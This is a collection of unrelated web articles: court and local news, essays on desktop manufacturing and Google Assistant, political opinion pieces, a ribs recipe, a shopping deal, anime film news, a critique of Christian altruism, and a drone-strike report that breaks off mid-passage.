Without further ado, here's what's new:
Clifton Williams of Chicago faces six months of jail time for a "loud and boisterous" yawn.
Make sure you get plenty of sleep before going to court.
Clifton Williams didn't and he's been sentenced to six months in jail for yawning.
"I was flabbergasted because I didn't realize a judge could do that," Williams' father, Clifton Williams Sr., told the Chicago Tribune. "It seems to me like a yawn is an involuntary action."
Williams, 33, attended his cousin's July hearing at Will County Courthouse in Joliet. His cousin, Jason Mayfield, pled guilty to a felony drug charge. As the judge sentenced Mayfield to two years probation, Williams let out a yawn, an involuntary faux pas in such a formal setting.
Circuit Judge Daniel Rozak thought the yawn was criminal and sentenced Williams to six months in jail, the maximum penalty for contempt of court without a jury trial. Rozak's order said that Williams "raised his hands while at the same time making a loud yawning sound," causing a disrespectful interruption in court.
So in a strange turn of events Mayfield, the felon, will be able to walk freely, while Williams, the yawner, will have to spend at least three weeks behind bars for his offending yawn. But it's not out of character for Rozak.
Contempt of court charges are typically issued when a judge feels someone is challenging or ignoring the court's authority, e.g., yelling at a judge, ignoring subpoenas, appearing in court drunk, etc.
But Rozak runs a tight ship. He has charged people who cuss in reaction to a sentencing and even jailed spectators whose cell phones interrupt proceedings. In fact, the Chicago Tribune found that Rozak has sentenced more spectators to jail for infractions involving cell phones than any other judge in Will County in the last decade.
Of the 30 judges in the 12th Judicial Circuit, Rozak has brought more than a third of all the contempt charges in the last 10 years.
"This is ridiculous -- you've got all these people shooting up kids, and here this boy yawns in court [and gets 6 months]. It's crazy," said Williams' 79-year-old grandmother.
Matt Bartosik, a "between blogs" blogger, is rarely loud and boisterous.
Copyright NBC Owned Television Stations / NBC New York
Tyler Wintermute
editor, I bought one of the first consumer 3D printer kits. It was one of the early MakerBot Cupcakes and it barely worked, but it blew my mind. It also changed my life. Today I've moved from media to manufacturing: I run 3D Robotics , a drone company with a big electronics and assembly factory in Tijuana, Mexico. (Yes, a Tijuana drone factory. Beat that, sci-fi!)
How is it possible for a magazine editor to become a high-tech manufacturer, essentially overnight? And how do you go from a bag-of-parts 3D printer to a full-scale factory? The answers are rooted in a revolution that's come to manufacturing over the past five years. The changes boil down to three ideas: desktop, digital, and cloud.
Desktop Fabrication
First: desktop. In the 1980s the personal computer brought desktop publishing to anyone who was interested, making a process that used to require typesetters and printing presses available to all (and creating a class of content creators who would ultimately fill the Web).
Now desktop fabrication tools are doing the same for physical objects. The 3D printer was the first of those technologies to go mainstream, but today in my home workshop my kids and I also use desktop CNC mills (a subtractive process that cuts away material, unlike a 3D printer's additive process of laying down new material), 3D scanners, CAD software, and even a desktop injection-molding machine. These machines cost less than $2000 each, and they are getting nearly as easy to use as an inkjet printer. A lot of the necessary CAD software is free.
True, none of these are designed for mass production; they're small and somewhat limited in the materials they can use. But you'd be surprised at how much of the manufacturing process can be done at this scale.
Take the injection molding of plastic parts. This is traditionally an expensive and time-consuming process for any company making hardware. After a part has been designed in CAD and prototyped on a 3D printer, it's typically sent to specialists to be turned into a mold, and then to an injection-molding factory that makes the final parts. That's a process that can cost at least $10,000 and take more than two months—just to get ready to start actually manufacturing anything.
For complex parts and large runs, that's still the right way to do it. But for simple components that will be made in batches of up to a few thousand, the whole process can now be done with desktop tools. Once you have the part itself designed, you can use plug-ins for CAD tools to generate a design for your mold, and then carve it out of aluminum on a three-axis desktop CNC mill. That mold can then be used with a desktop handpressed injection-molding machine that's no larger than a small drill press.
It's not hard to make six parts a minute, or 360 parts an hour. Several thousand can be produced in a few days by someone with no special skills at a cost of a few hundred dollars, as little as 1 to 2 percent of what professional production would cost. More important, the timeline is days, not months—you can make the parts on demand. The time savings alone can make this a game changer for small, fast-moving companies.
These are all examples of desktop manufacturing, which is the enabling technology trend for the maker movement. Although the manufacturing capability is sometimes exaggerated (desktop prototyping is usually closer to the truth with 3D printers), what's important about this democratization trend is that it taps the huge pool of talent, energy, and creativity outside the world of trained professionals.
Just like the PCs of the 1980s (which were more feeble than the professional computers of the time but available to far more people) and the Internet of the 1990s (which was slow and limited at the start but open to all), what desktop manufacturing tools lack in power, they more than make up for in accessibility. And they're getting better and cheaper even faster than the computing and communications technologies of the past two generations did—in part because they are built on the PC and the Web, and have inherited innovation models such as online content sharing that those technologies created.
The Power of Code
That brings us to the power of the second idea in the new industrial revolution: digital. Because these desktop tools have computers at their core, smart software replaces the machine-shop skills that used to be required to use them. Just as with desktop publishing a generation ago, complexity is replaced by code. Increasingly, what had been guild-like knowledge is being presented through onscreen wizards—and amateurs can handle processes that used to require trained toolmakers.
That dramatically lowers the barrier to entry for turning ideas into prototypes. And because today's designs start onscreen, in CAD tools of one sort or another, they exist as digital files that can easily be shared and modified. And that means that they align with the weave of the Web, fitting naturally into the online sharing and collaboration culture and turning what would have once been solo efforts into community projects.
Cloud-Based Service
That brings us to the third concept: cloud. Those same digital files don't have to be turned into physical objects on a desktop—they can also be sent to factories to be manufactured at any scale. A wide range of online manufacturing services has emerged alongside the maker movement, including Shapeways for 3D printing, Ponoko for laser cutting, Protomold for injection molding, and MFG for machine-shop services. (There are dozens of others for electronics at sites such as Alibaba, a gateway to working with Chinese factories of all sorts.)
That means that we finally have an end-to-end fabrication chain that's open to the individual, from prototyping to mass production. What the Web did to open media to the masses, the new movement is doing for manufacturing.
How am I so sure of all this? Because that's exactly the path we took at my own company. My cofounder, Jordi Munoz, and I started with an online community designing electronics and sharing files back and forth. Then Jordi bought a used desktop pick-and-place machine from eBay to make the electronics. After that came the CNC mills to make the drone airframe parts, bigger and better pick-and-place machines, 3D printers for prototyping, and more. For hard things, we started with cloud services such as Protomold and Alibaba, and then, once we understood them better, we brought that production in-house to save money and time.
Three years ago the company consisted of Jordi hand-soldering on a folding card table in his garage and me and my kids packing kits on the dining room table. Now we've got 35,000 square feet of factory space with four high-end pick-and-place lines, three CNC lines, and factory managers hired from companies such as Samsung and Foxconn running the show. All of this was learned by doing, not by schooling. And that's the magic of the new industrial revolution.
Chris Anderson, the former editor-in-chief of Wired magazine, is the cofounder of 3D Robotics, which sells small UAVs. Like many new entrepreneurs, he benefited from easy-to-use desktop tools such as 3D printers.
The Deal
$29 for a GLOSS Moderne high-gloss haircare duo ($71 list price), which includes:
One 8-ounce bottle of shampoo
One 8-ounce bottle of conditioner<p>
Free shipping<p>
Click here to return to Grouponicus.
####GLOSS Moderne High-Gloss Shampoo and Conditioner GLOSS Moderne's high-gloss shampoo and conditioner deliver a double dose of moisture to transform drab hair into a runway-ready 'do. The shampoo protects color and extends the life of keratin treatments as it simultaneously infuses locks with shine. Let the conditioner soak in for up to two minutes—or the time it takes to scrub your knees in slow motion—for silkier, more manageable hair that's freer from frizz. Both formulas are also free from sulfates, sodium chloride, and parabens. #####Features * High-gloss formulas create a silky texture on human hair and matted bigfoots * Free of harsh sulfates, sodium chloride, and parabens * Made in the United States
How to get your goods: by purchasing this Groupon and providing your name and shipping address, your order is complete!For questions pertaining to this deal, please visit the deal Q&A on this page. For post-purchase inquiries, please contact [Groupon customer service](http://gr.pn/zmfvIT).View the [Groupon Goods FAQ](http://gr.pn/yLXWNy) for additional information, including [how list price is determined](http://gr.pn/MGDGkC).
Every American president in recent history has had reasons to meet with dictators. Franklin D. Roosevelt divided up Europe with Stalin at the Yalta summit. Richard Nixon went to Beijing to meet Mao. Ronald Reagan welcomed Ferdinand and Imelda Marcos to the White House. Most of them met with Saudi princes, whether in Washington or Riyadh.
Contact is unavoidable; so too, sometimes, are deals, often justified as embarrassing sacrifices to be made in the name of a greater good. During the Cold War, the United States often backed vicious authoritarian leaders against vicious communist insurgencies. The reasons for this were best articulated by Jeane Kirkpatrick, who argued that while authoritarianism could be modified, communism could not, because its totalitarian aspirations killed off commerce, religion, civil society and much else.
This proved untrue — after 70 years, communism eventually collapsed — and as a policy it often ended badly (see: Vietnam). Yet even the most retroactively embarrassing encounters were at the very least part of a larger strategy. When Reagan welcomed Ferdinand Marcos to the White House in 1982, for example, he was careful to speak of the history of U.S.-Philippine friendship, “forged in shared history and common ideals.” He also praised the Philippine constitution: “Independence, liberty, democracy, justice, equality . . . are engraved in our constitutions and embodied in our peoples' aspirations.”
In his frequent and markedly enthusiastic comments about dictators, we hear no such aspirational language from President Trump. His admiration for men who torture and murder their opponents contains no historical or ethical nuance, no reference to theoretical ideals. Compare Reagan's language in 1982 with Trump's language a few weeks ago, when Abdel Fatah al-Sissi, Egypt's brutal dictator, visited Washington. “I just want to let everybody know, in case there was any doubt, that we are very much behind President Sissi,” he told the cameras. “He's done a fantastic job in a very difficult situation.”
Sissi has arrested tens of thousands of people, many of them tortured, many of them imprisoned for the “crime” of running independent charities or organizations.
His brutality is such that I've heard his prisons described as “factories for the creation of future Islamist fanatics.” His war on his people will increase instability in the region. Yet Trump's language was not just positive but also personalized. Sissi, he declared, has been “very close to me from the first time I met him.”
For Sissi, this encounter was important: It helped to solidify his authority at home, justify his brutality and reinforce his power. Trump's congratulatory call to Turkish President Recep Tayyip Erdoğan after he won (probably through rigging the vote) a referendum giving him dictatorial powers will help him enforce those, too. Trump's White House invitation to Rodrigo Duterte, the Philippine president who has ordered police to shoot thousands of suspected drug dealers without arrest or trial, will have the same effect: “You know, he's very popular in the Philippines,” said Trump. “He has a very high approval rating in the Philippines.”
None of this lavish praise has a strategy behind it. (In some cases, it may shore up the president's business interests. Trump has investments in the Philippines, as well as Turkey, from which he derives undisclosed income; Duterte has already sent Trump's Manila business partner to be a special envoy to the United States.) Nor is there evidence to suggest deeper diplomatic goals or some kind of clever game. Instead, Trump's apparent admiration for bizarre and cruel men such as Kim Jong-un — he called the North Korean dictator a “smart cookie” whom he would be “honored” to meet — is simply consistent with his long-standing practice. He has willingly worked with corrupt and otherwise unsavory business partners in the past — he chose, for example, to partner with allies of Iran's Revolutionary Guard Corps in the construction of a mysteriously empty luxury building in Azerbaijan — and now he's still doing it.
Because Trump says so many outrageous things every day, it's easy to lose sight of just how dramatic this shift in paradigm is going to be and just how profound will be the consequences on the ground. For 70 years, the United States has helped maintain peace in much of the world thanks to a system of alliances based on a common belief in democracy. For the same period of time, American presidents have supported those alliances rhetorically as well as militarily and economically, and the United States has profited from that support. Now that the U.S. president no longer distinguishes between dictators and democrats, expect the former to grow stronger and more violent. Expect democratic alliances to grow weaker. Expect peace and prosperity to diminish.
Expect people to look elsewhere for moral leadership. During a televised meeting with Russian President Vladimir Putin this week, one Western leader publicly asked him to stop religious repression and the torture of gay men in Russian prisons. That's the kind of language we were once accustomed to hearing from the “leader of the free world” — and, of course, that's the language we can expect now only from the chancellor of Germany, Angela Merkel.
Read more from Anne Applebaum's archive, follow her on Twitter or subscribe to her updates on Facebook.
Difficulty 2/5 | Prep time 15 mins
Cook time 6 hrs | Serves 6-8
Hardwood Hickory
Our famously easy 3-2-1 ribs recipe will make your rib game the envy of the neighborhood. This super simple recipe takes all the confusion out of making ribs without sacrificing any flavor. Start by smoking your ribs for 3 hours, then cook inside foil for 2 hours and finish by removing from foil and brushing on sauce for up to an hour.
If your butcher has not already done so, remove the thin silverskin membrane from the bone-side of the ribs by working the tip of a butter knife or a screwdriver underneath the membrane over a middle bone. Use paper towels to get a firm grip, then tear the membrane off.
In a small bowl, combine the mustard, 1/4 cup of apple juice (reserve the rest), and the Worcestershire sauce. Spread the mixture thinly on both sides of the ribs and season with Traeger Pork & Poultry Rub.
When ready to cook, set temperature to 180℉ and preheat, lid closed for 15 minutes.
Smoke the ribs, meat-side up for 3 hours.
Transfer the ribs to a rimmed baking sheet and increase the grill temperature to 225℉.
Tear off four long sheets of heavy-duty aluminum foil. Top with a rack of ribs and pull up the sides to keep the liquid enclosed.
Sprinkle half the brown sugar on the rack, then top with half the honey and half of the remaining apple juice. Use a bit more apple juice if you want more tender ribs.
Lay another piece of foil on top and tightly crimp the edges so there is no leakage. Repeat with the remaining rack of ribs.
Return the foiled ribs to the grill and cook for an additional two hours.
Carefully remove the foil from the ribs and brush the ribs on both sides with Traeger 'Que Sauce. Discard the foil.
Arrange the ribs directly on the grill grate and continue to grill until the sauce tightens, 30 minutes to 60 minutes more.
Let the ribs rest for a few minutes before serving. Enjoy!
*Cook times will vary depending on set and ambient temperatures.
Access this, and over a thousand other Traeger recipes on the Traeger App.
TV Tokyo aired a two-hour special on the Puella Magi Madoka Magica anime franchise on Monday, and the special ran the first three minutes of Puella Magi Madoka Magica The Movie -Rebellion- (Gekijō-ban Mahō Shōjo Madoka Magica Shinpen: Hangyaku no Monogatari).
[Note: Highlight the text below for the story, which contains spoilers for the end of the television series and first two films]
The film begins as the magical girls apparently take on a witch. The first three minutes has two lines of dialogue:
Sayaka: “Bingo, Madoka!”
Kyoko: “Defense is at the ready!”
The film's premise is as follows:
A girl becomes a magical girl in exchange for her wish. The magical girls have a fate to fight against the witches, the harbingers of destruction that plant the seeds of despair, and in the end, they will succumb to despair and transform into witches themselves... The terrible cycle that had repeated so many times was finally ended by Madoka Kaname's sacrifice, and the world was led into a new order. However, the magical girls' battle must continue. The reason for this is because it is the compensation for the miracle. Unable to let her memories of Madoka die, Homura Akemi, the magical girl left behind continues to fight alone in the revived world. Her feelings pave the way for a new story. ...Madoka Kaname, the girl who had become the pillar to the order of the circle and Sayaka Miki, the girl who had lost her life when her magical power ran out both appear in front of Homura. What is the meaning of the appearance of two girls who should not exist anymore at all? Will Nagisa Momoe, the new magical girl who has an unsure face, tell the truth of the matter? And what is the new being that fights against the order of god and tramples the world? The true climax of Puella Magi Madoka Magica ! The story reaches the unbelievable “incredible finale”...
Akiyuki Shinbo and Yukihiro Miyamoto directed the third film at SHAFT with original character designs from manga creator Ume Aoki (Hidamari Sketch). Yuki Kajiura provided the music .
The main cast returned from the television series and previous two films, with Aoi Yūki as Madoka Kaname, Chiwa Saito as Homura Akemi, Eri Kitamura as Sayaka Miki, Kaori Mizuhashi as Mami Tomoe, Ai Nonaka as Kyōko Sakura, and Emiri Katō as Kyubey. Kana Asumi joined the cast as the new magical girl Nagisa Momoe. There is also a new enemy named Nightmare who is not a witch.
The film will play in the United States and Canada with English subtitles starting December 6. In addition, there will be a Hollywood premiere event at the Egyptian Theater on December 3, although it is now sold out.
The third film opened in Japan two weekends ago. Aniplex announced at Japan Expo in Paris that the film will debut in France in November. Aniplex aims to release the third film in still more countries worldwide, just as it did for the first two films.
Aniplex producer Atsuhiro Iwakami stated the day after the film opened that "the franchise is now at a blank page. Personally, I think if there is a chance for more…"
[Via NicoTubeAnime]
The focus of Google's big hardware event this week wasn't the hardware at all. It was Assistant, the artificially intelligent digital helper that caters to your every whim and powers your every interaction.
Assistant is invisible, in the design-jargon sense. The omnipresent concierge works in the background, predicting your needs, processing your requests, and offering neatly parceled answers to your questions. You never see the cogs behind it, you merely type (or speak) a command and read (or hear) tailored responses served on screen or through a speaker.
This requires more than a smartphone, which explains the gadgets Google announced Tuesday. But as Google likes to say, these are early days for a multi-portal system that includes a phone like Pixel and an Amazon Echo-like device like Home. “Five years ago, if we were talking about this, there was the belief that the phone would be the interface to everything,” says Alan Black, a computer scientist at Carnegie Mellon University's Language Technologies Institute.
That is no longer the case. Google wants its intangible interface everywhere you are, which requires having it everywhere you are—in your pocket, in your car, in your kitchen, and so on—so it can learn everything about you and provide a personalized experience. Until now, Google only dabbled in devices, relying largely on companies like Samsung, HTC, and Motorola to provide the hardware that ran its software.
The way to get the AI in front of you is to embody it in hardware. Jon Mann
Now, to make its invisible AI mainstream, Google must make its own products. Two of them are especially important: Pixel, which resembles an iPhone, and Home, which looks a bit like a Glade air freshener. These portals to Google Assistant are attractive, but nothing spectacular. "There's nothing too Earth-shattering about them. The phone is just a piece of aluminum,” says Mark Hung, a tech analyst at research firm Gartner. “What matters is the fact that you're able to use them fairly seamlessly, through a conversational interface.”
The devices, in other words, exist merely as vessels. Rick Osterloh, head of Google's new hardware group, suggested as much when he said Google decided to build hardware so the company can “get things done without worrying about the underlying tech.” In this instance, “get things done” means deliver a rich AI experience—something Google's spent the better part of its existence preparing for.
Consider Google's information bank, called Knowledge Graph, which has enhanced your search results since 2012. Today, it contains more than 70 billion facts. Assistant can tap that repository, and its conversational UI will only improve as it sees–and learns from—how and when people access it.
This explains why Google suggests placing a Home in every room. “The way to get the AI in front of you is to embody it in hardware,” says Jon Mann, an interaction designer at Artefact. "You need the access points so that it feels ubiquitous.” Today, your primary access point probably is your phone, and your home is among the few places where it may not be at your side. If Google can convince you to sprinkle access points around, it can train you to summon Assistant wherever you want, for whatever you want, whenever you want.
Shifting users toward intent-driven interactions is key to making AI work. Take this typical Spotify interaction: Open your phone, open Spotify, click to search, type what you want to hear. If you're just listening on your phone, you're done. Anything else takes a bit more work. “If I want to stream music to speakers in my living room, that's multiple steps I have to take, and I have to work through discovering the trigger points on the app,” Mann says. Designers thoughtfully craft those trigger points, making sure that you see controlled amounts of information in a logical order. AI increasingly handles that. Want music? Simply say, "Play SubRosa." The more portals to Assistant you surround yourself with, the more places you can ask for it.
This is where Google's Be Everywhere model starts getting interesting. Because the more portals you surround yourself with, the more Assistant can learn about not just how you ask for help, but where, and in what context. “If they can execute on that, it's really going to be quite revolutionary,” Hung says. Indeed, Google already is considering how best to interact with you in a multi-portal environment; if you pose a question aloud and multiple Home devices hear your request, the nearest node will provide the answer.
It's easy to imagine how this kind of contextual awareness will add an extra dimension to Assistant's intelligence, making it truly usable. That's essential to meeting—and exceeding—user's expectations. “I do think we are now moving to this state where we will expect to be able to say at any time things that will be answered by a speech interface,” Black says. Google's decision to bake its AI into a web of devices that work together certainly indicates as much.
The DC Court of Appeals has just thrown out the lawsuit, filed by the hockey stick trickster Michael Mann against the National Review Online. Mann's lawsuits against Mark Steyn and CEI/Rand Simberg are still pending.
These lawsuits are frequently attributed to Mann's excessive sensitivity. I disagree. These lawsuits were filed in October 2012, following Climate Accountability, Public Opinion, and Legal Strategies Workshop, held in June 2012. Filing Strategic Lawsuits Against Public Participation (SLAPP) was one of the strategies, formulated at that gathering: “Lawyers at the workshop noted that libel lawsuits can be an effective response to the fossil fuel industry's attempts to discredit or silence atmospheric scientists. Pennsylvania State University's Michael Mann, for instance, has worked with a lawyer to threaten libel lawsuits for some of the things written about him in the media, and has already won one such case in Canada [against Dr. Timothy Ball – LG]. … Roberta Walburn noted that libel suits can also serve to obtain documents that might shed light on industry tactics,” according to the Summary of the Workshop, written by one of its participants.
UCS (should mean the Union of Con Scientists) and the Climate Accountability Institute, having Mann as an adviser, claimed the responsibility for the “workshop”, and a number of wealthy foundations sponsored it. Mann filed his lawsuits only after some deep pockets approved SLAPP as one among “multiple, complementary strategies” and agreed to fund them.
This strategy was probably discarded when press associations and other left-leaning organizations (including ACLU) condemned these lawsuits. The strategy relying on “sympathetic attorneys general” went forward.
An elderly US woman says it was her family's enduring bond that inspired five of 11 surviving siblings to move to the same nursing home.
Over the past four years, siblings Carmen Wesela, 98, Georgia Southwick, 93, Mary Cena, 92, Lawrence Mallia, 90 and Lucy O'Brien, 85, and have all moved to the Jeffrey and Susan Brudnick Centre for Living in Peabody, Massachusetts.
Ms Cena said living under the same extended roof has enabled them to look after one another.
“We all have different health problems and medical appointments now, but we do always check on one another,” she told TODAY US.
“The 11 of us always got along. There was a lot of love in our family and you can see so much proof of that today.”
Ms Wesela was the first to arrive at the centre in 2012. She was initially joined by widow Ms Cena in 2013, followed by Ms Southwick and Ms O'Brien in 2015 and Mr Mallia in 2016.
Four of the five siblings previously worked at a family-owned grocery store until 1978, with many growing up together in either Peabody or in neighbouring towns.
Ms Wesala, her late husband, and sisters Ms Southwick, Ms Cena, and Ms O'brien, and a late brother, Sam. (Janice Regis) ()
Prior to moving in together, the sibling maintained regular contact, sharing a weekly bridge game together.
Ms Cena said her only regrets are not being able to share the same experience with her other siblings.
“We are all just so happy to be together again. I just wish my other brothers and sisters could have experienced this with us,” she said.
Ms Cena hopes her story while convey to readers the importance of appreciating and enjoying the company of loved ones.
“When you're old and you think of the best time of your life, you think of those times when you were surrounded by family and friends,” she said.
“Those were the best times of my life. I couldn't ask for anything better in the end.”
Have a good news story you'd like to share? We'd like to hear from you. You can reach us at contact@9news.com.au.
© Nine Digital Pty Ltd 2019
Altruism is not the equivalent of helping friends, or general benevolence to strangers. Altruism is putting the interests of others first, before your own. It is harming yourself and your life so that others may be better off (allegedly.) It is giving of yourself to others when it is against your long-term interests (mental and physical) to do so.
Christianity manifestly preaches this self-sacrifice for others–this altruism–with respect to one's own interests in the real world:
“But I tell you, do not resist an evil person. If anyone slaps you on the right cheek, turn to them the other cheek also. And if anyone wants to sue you and take your shirt, hand over your coat as well. If anyone forces you to go one mile, go with them two miles. Give to the one who asks you, and do not turn away from the one who wants to borrow from you. “You have heard that it was said, ‘You shall love your neighbor and hate your enemy.' But I say to you, Love your enemies and pray for those who persecute you…” –Jesus (Matthew 5:39-44)
“If you want to be perfect, go, sell your possessions and give to the poor, and you will have treasure in heaven.” –Jesus (Matthew 19:21) “What is more, I consider everything a loss because of the surpassing worth of knowing Christ Jesus my Lord, for whose sake I have lost all things. I consider them garbage, that I may gain Christ and be found in him, not having a righteousness of my own that comes from the law, but that which is through faith in Christ…” –Paul (Philippians 3:8-9)
“We who are strong ought to bear with the failings of the weak and not to please ourselves. Each of us should please our neighbors for their good, to build them up. For even Christ did not please himself but, as it is written: ‘The insults of those who insult you have fallen on me.'” –Paul (Romans 15:1-3)
“The Spirit Himself bears witness with our spirit that we are children of God, and if children, then heirs—heirs of God and joint heirs with Christ, if indeed we suffer with Him, that we may also be glorified together. For I consider that the sufferings of this present time are not worthy to be compared with the glory which shall be revealed in us.” –Paul (Romans 8:16-18)
“We must give until it hurts. For love to be true it has to hurt. It hurt Jesus to love us; it hurt God to love us because He had to give. He gave His Son. This is the meaning of true love, to give until it hurts.” –Mother Teresa Share in suffering as a good soldier of Christ Jesus. No soldier gets entangled in civilian pursuits, since his aim is to please the one who enlisted him. –Paul (2 Timothy 2:3-4)
Now listen to this segment of “The Jesus Christ Show” from KFI AM 640 in the Los Angeles area. The host is Neil Saavedra, who role-plays as Jesus Christ and takes calls from people seeking advice. Pay special attention to the caller's rationale for not calling the police on his physically abusive girlfriend:
It would ruin her life! Tom is willing to sacrifice so that she doesn't have her life ruined by going to prison.
Notice that during this call, “Jesus” acts purely as a secular counselor. He doesn't speak of “perseverance in the face of persecution,” he doesn't speak of “glorying in one's sufferings for Christ,” he doesn't quote “turn the other cheek” from the Sermon on the Mount. Instead he speaks of the rather un-Christ-like “law of consequence.”
“If anyone slaps you on the right cheek, call the police and have them arrested.” –New Jesus (The Gospel According to Neil 5:39)
If the Bible has one message for Tom, it's that he should suffer with Christ, and his girlfriend should be preached to and entreated to repent in the name of Christ. Where is she going to hear the message of Christ most loudly: in a secular prison system, or from her patient, Christian, unconditionally “loving” boyfriend? Real Christianity calls for his sacrifice here, and would keep him in this abusive situation.
(The sort of inconsistency displayed by “Radio Jesus” is endemic to modern Christianity. This is due to the fact that it has been pared down and compromised to fit in with a modern, Western lifestyle of worldly goal-achievement, rather than the monastic renunciation of the Middle Ages.)
Now, since I'm not a Christian or an altruist, but an egoist, I do not advocate Tom's self-sacrifice for the sake of an immoral person who attacks him. The Bible and its moral code of self-sacrifice should be discarded, and he most certainly should call the police and have her arrested. But that's me and Ayn Rand, not the Bible.
(Note that, just because someone can quote something from the Bible that can be interpreted in a way that would allow Tom to call the police, this does not mean that the Bible “doesn't really mean the part about suffering for others and Christ.” All this means is that the Bible is an inconsistent collection of cultural sayings and parables. The fact that the Bible contradicts itself does not contribute to its utility as a moral guide, or its friendliness to happiness in the real world.)
Here's a selection of other relevant New Testament quotes:
“It was also said, ‘Whoever divorces his wife, let him give her a certificate of divorce.' But I say to you that everyone who divorces his wife, except on the ground of sexual immorality, makes her commit adultery, and whoever marries a divorced woman commits adultery.” –Jesus (Matthew 5:31-32)
“For though I am free from all men, I have made myself a slave to all, so that I may win more….To the weak I became weak, that I might win the weak; I have become all things to all men, so that I may by all means save some.” –Paul (1 Corinthians 10:19, 22-23)
“Do nothing from selfishness or conceit, but in humility count others better than yourselves.” –Paul (Philippians 2:3)
“Beloved, do not be surprised at the fiery trial when it comes upon you to test you, as though something strange were happening to you. But rejoice insofar as you share Christ's sufferings, that you may also rejoice and be glad when his glory is revealed. If you are insulted for the name of Christ, you are blessed, because the Spirit of glory and of God rests upon you. But let none of you suffer as a murderer or a thief or an evildoer or as a meddler. Yet if anyone suffers as a Christian, let him not be ashamed, but let him glorify God in that name.” –1 Peter 4:12-19
Ayn Rand offered sharply contrasting advice:
[Edit 6-27-13: Audio start time fixed.]
[Edit 7-24-15: Added a couple of lines below the link for clarification and emphasis.]
[Edit 3-26-16: Embedded video of Jesus Show segment; added last 2 images.]
—–
Related Posts:
The Bible (New Testament) as Evidence
Other People as Egoistic Values Versus Other People as Objects of Self-Sacrifice in Ayn Rand's Philosophy
Atlas Shrugged, Altruism and Egoism
A Refutation of the Argument from Design
God: The Immovable Mover
Madame Rose, one of the "sisters" in Goose Island Beer Co.'s sour line, is ready for her debut after spending nearly two years in wine barrels.
The Belgian-style sour ale is set to hit taps and shelves today. It's the third time the beer has made an appearance since it was first made in 2010. The last release was in 2012.
Madame Rose is brewed at Goose Island's West Fulton Street facility and mixed with sour Michigan cherries before being poured into cabernet barrels. The beer is part of a barrel-aged line that includes Halia, Gillian, Sofie, Juliet and Lolita.
Demand for Goose Island's barrel-aged beers have grown so much in recent years that the brewery, owned by Anheuser-Busch InBev, quadrupled its warehouse space to expand production. The new 130,000-square-foot space will hold barrels for Goose Island's Bourbon County line and its sour sisters.
—Lorene Yue
San Jaun River, Navajo Nation — (RT) The Navajo Nation has filed a $160 million lawsuit against the US government for damages and ongoing injuries caused by an August 2015 mine spill which released millions of gallons of toxic waste near the tribe's territory.
The filing, announced in a Monday press release, claims that the Gold King Mine spill negatively impacted communities along the San Juan River on Navajo Nation territory when it released millions of gallons of toxic waste – including lead, arsenic, and mercury – into the nearby Animas River, ultimately transforming the connecting San Juan River from a “life-giver and protector” to a “threat” to the Navajo people, crops, and animals.
“In particular, it has impaired our ability to maintain the cultural, ceremonial, and spiritual practices that undergird the Navajo way of life. Through this claim and our corresponding lawsuit, we are demanding that the US government finally provide the Navajo Nation relief,” Navajo Nation Attorney General Ethel Branch said in the release, according to USA Today.
The lawsuit is aimed at the Environmental Protection Agency (EPA), which has claimed responsibility for the spill. It seeks $159 million in damages, as well as an additional sum of around $3.2 million to cover expenses already submitted to the EPA which have yet to be reimbursed.
A seven-page letter from the tribe to the EPA claims officer Kenneth Redden describes what happened the day of the spill, noting that “shortly after beginning the excavation, the operator hit a spurt of water. Within minutes, a massive volume of toxic water poured out of the mine uncontrollably.”
It also mentions video footage during the blowout at the mine near Silverton, Colorado, in which a worker reportedly said “What do we do now?” It goes on to accuse the EPA of having “insufficient emergency protocols in place” and being “entirely unprepared to deal with the colossal damage it had unleashed.”
The letter also claims the agency failed to notify the reservation's residents of the spill for “nearly two days,” and accuses it of ignoring the “years-long buildup of contaminants in the Gold King Mine, despite being on notice of the risk of a blowout.”
The document stresses that the spill “continues to harm the Navajo Nation and will do so for years to come,” noting the ongoing need for medical monitoring, mental health counseling, ecological monitoring, and other programs aimed at identifying and addressing the “near and long-term impacts on the environment and Navajo people.”
The newest filing comes just four months after the Navajo Nation filed a separate suit against the EPA in August.
The mine spill ultimately tainted waters in Colorado, New Mexico, and Utah. The Navajo Nation is present in two of those states – southwestern Utah and northwestern New Mexico. The territory, which spans 27,425 square miles, also occupies portions of northeastern Arizona.
The Monday press release came just one day after the Standing Rock Sioux Tribe announced it had emerged victorious in its fight against the Dakota Access Pipeline, stating that the US Army Corps of Engineers will not grant permission for the disputed pipeline to cross Lake Oahe, and that alternative routes are being studied.
The pipeline, which the tribe argued would threaten the community's drinking water and damage sites of sacred significance, was the subject of a fierce standoff between protesters and local authorities, with many officers accused of using violent measures against peaceful demonstrators in recent weeks.
US resumes drone killings in Pakistan
By Bill Van Auken
1 May 2012
Washington ended a month-long pause in its campaign of drone attacks in Pakistan's tribal areas Sunday, killing four “suspected militants” in North Waziristan and provoking a formal protest from the government in Islamabad.
The strike by the remotely piloted aircraft on Miranshah, the capital of North Waziristan, part of Pakistan's Federally Administered Tribal Areas, expressed Washington's unconcealed contempt for the Pakistani government, which had publicly conditioned a resumption of its full collaboration in the so-called AfPak war on a halt to the drone attacks.
Pakistan's Foreign Ministry issued a formal statement saying that it “strongly condemns the US drone attack that occurred in North Waziristan today.” The statement continued: “Such attacks are in total contravention of international law and established norms of interstate relations. The Government of Pakistan has consistently maintained that drone attacks are violative of its territorial integrity and sovereignty. The matter will be taken up through diplomatic channels both in Islamabad and Washington.”
The drone strike comes on the heels of last week's negotiations in Islamabad between the Pakistani government and a US team led by US Special Representative for Afghanistan and Pakistan Marc Grossman.
Pakistani officials had indicated Sunday that a deal was in the works in which Pakistan would agree to reopen its borders to the transport of material for the US-led occupation troops in Afghanistan in return for the payment of some $1.1 billion in withheld coalition support funds, money which Washington and its allies had agreed to pay Islamabad for expenses incurred in counterinsurgency operations in the border region. No payments have been made since mid-2010.
The deal is of decisive importance for Washington, given that the route from Pakistani seaports to Afghanistan is far less costly than the alternative it has pursued through Central Asia to the north. Moreover, given the carrying through of a scheduled drawdown of large numbers of US and NATO troops, it will be next to impossible to ship out the huge quantities of vehicles, heavy weapons and other equipment that have been amassed in Afghanistan over more than a decade of war without access to the Pakistani supply routes.
One stumbling block in the negotiations was reportedly Islamabad's demand that Washington issue an unconditional apology for the slaying last November of 24 Pakistani troops in strikes by US attack helicopters and fighter jets against a border post inside Pakistan.
